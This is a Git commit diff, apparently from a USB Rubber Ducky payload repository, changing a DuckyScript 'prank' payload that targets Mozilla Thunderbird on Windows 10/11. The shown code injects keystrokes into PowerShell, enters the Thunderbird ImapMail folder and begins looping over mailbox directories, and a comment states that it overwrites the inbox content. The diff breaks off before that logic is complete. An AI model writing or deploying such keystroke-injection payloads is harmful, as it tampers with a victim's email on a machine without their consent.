[+] STRINGLN_POWERSHELL

pull/453/head
Aleff 2024-06-06 10:03:22 +02:00 committed by GitHub
parent fe2a080aae
commit 255713357b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 8 additions and 8 deletions

View File

@ -1,11 +1,11 @@
REM ##################################################### REM #####################################################
REM # # REM # #
REM # Title : Prank In The Middle - Thunderbird # REM # Title : Prank In The Middle - Thunderbird #
REM # Author : Aleff # REM # Author : Aleff #
REM # Version : 1.0 # REM # Version : 1.0 #
REM # Category : Prank # REM # Category : Prank #
REM # Target : Windows 10/11 # REM # Target : Windows 10/11 #
REM # # REM # #
REM ##################################################### REM #####################################################
EXTENSION DETECT_READY EXTENSION DETECT_READY
@ -81,7 +81,7 @@ ENTER
DELAY 500 DELAY 500
REM Get the INBOX content and edit it overwriting. Then close the powershell REM Get the INBOX content and edit it overwriting. Then close the powershell
STRINGLN STRINGLN_POWERSHELL
cd ImapMail cd ImapMail
$directories = Get-ChildItem -Directory | Select-Object FullName $directories = Get-ChildItem -Directory | Select-Object FullName
foreach ($dir in $directories) { foreach ($dir in $directories) {